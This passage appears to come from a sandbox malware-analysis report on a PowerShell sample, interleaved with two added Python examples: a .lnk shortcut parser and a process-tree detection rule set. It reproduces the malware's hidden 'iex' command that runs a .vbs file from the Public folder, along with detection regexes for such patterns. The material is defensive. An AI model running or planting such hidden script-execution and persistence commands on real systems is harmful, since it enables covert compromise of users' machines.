      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe  Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe  Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 5651
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 4044
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 6380
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 3344
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968  Thread sleep time: -13835058055282155s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844  Thread sleep count: 6380 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844  Thread sleep count: 3344 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880  Thread sleep time: -9223372036854770s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7452  Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe  File opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData
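The Start Menu directory accesses above, together with the report's "Powershell creates an autostart link" signature, point at a persistence artifact dropped under the user's Startup folder. When that artifact is a Windows shortcut (.lnk), the responder's first question is what it launches and how. The parser below is an added example, not part of the Joe Sandbox report or of the sample: it reads the fields of the Shell Link format (MS-SHLLINK) that matter for triage (LocalBasePath, command-line arguments, ShowCommand and the EnvironmentVariableDataBlock target) and flags common abuse patterns. The shortcut it parses is constructed inline by build_lnk; its target and arguments are modelled on the child PowerShell command line recorded in this report and are not a claim about what the real dropped link contains.

```python
import re
import struct

# ShellLinkHeader constants (MS-SHLLINK 2.1)
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
ENV_VAR_BLOCK_SIG, ENV_VAR_BLOCK_SIZE = 0xA0000001, 0x314   # EnvironmentVariableDataBlock
SW_SHOWMINNOACTIVE = 7

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe", "rundll32.exe"}
SUSPICIOUS_ARGS = re.compile(
    r"(?i)(-w(in[a-z]*)?\s+hidden|\biex\b|invoke-expression|downloadstring|-e(nc[a-z]*)?\s+[a-z0-9+/=]{20,}|\.vbs\b|\.hta\b|\.js\b)")


def parse_lnk(data: bytes) -> dict:
    """Extract the triage-relevant fields of a Shell Link (.lnk) file."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 20)
    show_command, = struct.unpack_from("<I", data, 60)
    info = {"show_command": show_command, "local_base_path": None, "env_target": None,
            "name": "", "relative_path": "", "working_dir": "", "arguments": "", "icon_location": ""}
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:              # skip the PIDL; paths come from LinkInfo/StringData
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        li_size, _hdr, li_flags, _vol_off, lbp_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 0x1:                            # VolumeIDAndLocalBasePath: NUL-terminated ANSI path
            start = pos + lbp_off
            info["local_base_path"] = data[start:data.index(b"\x00", start)].decode("cp1252", "replace")
        pos += li_size
    # StringData: fixed order, each a uint16 char count followed by the chars (no terminator)
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                      (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            count, = struct.unpack_from("<H", data, pos)
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + count * width]
            info[key] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
            pos += count * width
    # ExtraData: (size, signature) blocks until a block shorter than 4 bytes (TerminalBlock)
    while pos + 8 <= len(data):
        size, sig = struct.unpack_from("<II", data, pos)
        if size < 4:
            break
        if sig == ENV_VAR_BLOCK_SIG and size == ENV_VAR_BLOCK_SIZE:   # %VAR%-style target, often the only one present
            uni = data[pos + 8 + 260:pos + 8 + 260 + 520]
            info["env_target"] = uni.decode("utf-16-le").split("\x00", 1)[0]
        pos += size
    return info


def triage_lnk(info: dict) -> list:
    """Return human-readable reasons why a parsed shortcut deserves a closer look."""
    reasons = []
    target = info["env_target"] or info["local_base_path"] or info["relative_path"] or ""
    exe = target.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe in SCRIPT_HOSTS:
        reasons.append(f"script-host target: {exe}")
    for m in SUSPICIOUS_ARGS.finditer(info["arguments"]):
        reasons.append(f"suspicious argument: {m.group(0)}")
    if re.search(r"(?i)\\users\\public\\|\\appdata\\|\\temp\\", target):
        reasons.append("target lives in a user-writable staging directory")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window starts minimized (SW_SHOWMINNOACTIVE)")
    return reasons


def build_lnk(local_base_path: str, arguments: str, show_command: int = 1, env_target: str = None) -> bytes:
    """Assemble a minimal, spec-conformant .lnk for offline testing (constructed sample, not a real dropped file)."""
    flags = HAS_LINK_INFO | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack(
        "<IIQQQIiIHHII", flags, 0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    path_b = local_base_path.encode("cp1252") + b"\x00"
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"   # DRIVE_FIXED, empty volume label
    lbp_off = 0x1C + len(volume_id)
    suffix_off = lbp_off + len(path_b)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x1, 0x1C, lbp_off, 0, suffix_off) + volume_id + path_b + b"\x00"
    args_b = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    extra = b""
    if env_target:
        extra = struct.pack("<II", ENV_VAR_BLOCK_SIZE, ENV_VAR_BLOCK_SIG) \
            + env_target.encode("cp1252").ljust(260, b"\x00") + env_target.encode("utf-16-le").ljust(520, b"\x00")
    return header + link_info + args_b + extra + struct.pack("<I", 0)   # TerminalBlock


# Constructed sample; arguments modelled on the child PowerShell command line in this report.
SAMPLE_LNK = build_lnk(
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r'''-win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"''',
    show_command=SW_SHOWMINNOACTIVE,
    env_target=r"%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe")

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    print(parsed["env_target"] or parsed["local_base_path"], parsed["arguments"])
    for reason in triage_lnk(parsed):
        print(" -", reason)
```

On a live host the same parser runs over every file in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup and the machine-wide ProgramData Startup folder; shortcuts whose target comes only from the EnvironmentVariableDataBlock, or whose window starts minimized, are the ones worth pulling first, because both are used to keep the launched script host out of sight.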
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: svchost.exe, 00000009.00000002.2580656710.0000014B3DE2B000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW0
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Add-NetEventVmNetworkAdapterX
      Source: svchost.exe, 00000009.00000002.2582164673.0000014B43441000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2582217862.0000014B43454000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA64000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match  File source: amsi64_7572.amsi.csv, type: OTHER
      Source: Yara match  File source: Process Memory Space: powershell.exe PID: 7572, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
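The two process-creation lines above give the parent/child relationships a detection engineer wants to encode: PowerShell starting a second, hidden PowerShell that builds a script path from the PUBLIC environment variable and hands it to Invoke-Expression, and the same PowerShell opening a PDF in Acrobat. The following is an added example, not part of the Joe Sandbox report, that runs such rules over Sysmon-style process-creation records and ranks the resulting process tree. The records are constructed inline: the two child command lines are copied from the report; the parent's command line (with -ExecutionPolicy Unrestricted), the explorer/notepad pair and every PID other than 7572 are assumptions made for the example.

```python
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
DOC_VIEWERS = {"acrobat.exe", "acrord32.exe", "winword.exe", "excel.exe"}

# Command-line rules; each one encodes a switch or construct seen in the process tree above
CMDLINE_RULES = [
    ("execution policy lowered to an insecure level", re.compile(r"(?i)-(ep|ex[a-z]*)\s+(unrestricted|bypass)")),
    ("hidden window requested", re.compile(r"(?i)-w(in[a-z]*)?\s+hidden")),
    ("Invoke-Expression on a computed string", re.compile(r"(?i)(\biex\b|invoke-expression)")),
    ("payload referenced under the Public profile",
     re.compile(r"(?i)(\\users\\public\\|getenvironmentvariable\(\s*'public'\s*\))")),
]


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon event 1 / Security 4688 subset)."""
    pid: int
    ppid: int
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events) -> list:
    """Apply command-line rules to every event and parent/child rules to every resolvable pair."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        for rule, rx in CMDLINE_RULES:
            if rx.search(e.command_line):
                findings.append(Finding(e.pid, rule))
        parent = by_pid.get(e.ppid)
        if parent is None or image_name(parent.image) not in SCRIPT_HOSTS:
            continue
        child, par = image_name(e.image), image_name(parent.image)
        if child in SCRIPT_HOSTS:
            findings.append(Finding(e.pid, f"{par} spawned a second script host ({child})"))
        elif child in DOC_VIEWERS:
            # a document opened for the user by a script host rather than by the shell
            findings.append(Finding(e.pid, f"document viewer {child} launched by {par}"))
    return findings


def score(events) -> dict:
    """Findings per PID, so a hunt can rank process trees by how much they trip."""
    counts = {}
    for f in analyze(events):
        counts[f.pid] = counts.get(f.pid, 0) + 1
    return counts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ACROBAT = r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe"

# Constructed records: PIDs other than 7572, the parent command line and the explorer/notepad pair are assumed.
SAMPLE_EVENTS = [
    ProcEvent(4200, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(7572, 4200, PS, '"' + PS + r'" -ExecutionPolicy Unrestricted -File "C:\Users\user\Desktop\sample.ps1"'),
    ProcEvent(8012, 7572, PS,
              '"' + PS + r'''" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"'''),
    ProcEvent(8040, 7572, ACROBAT, '"' + ACROBAT + r'" "C:\Users\user\Desktop\List of Required items and services.pdf"'),
    ProcEvent(5000, 4200, r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\Users\user\notes.txt"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f.pid, f.rule)
    print(score(SAMPLE_EVENTS))
```

The parent/child rule is the one that survives obfuscation of the command line: however the second PowerShell is spelled, a script host spawning another script host with a hidden window, and then a PDF reader, is a tree shape worth alerting on by itself.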
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
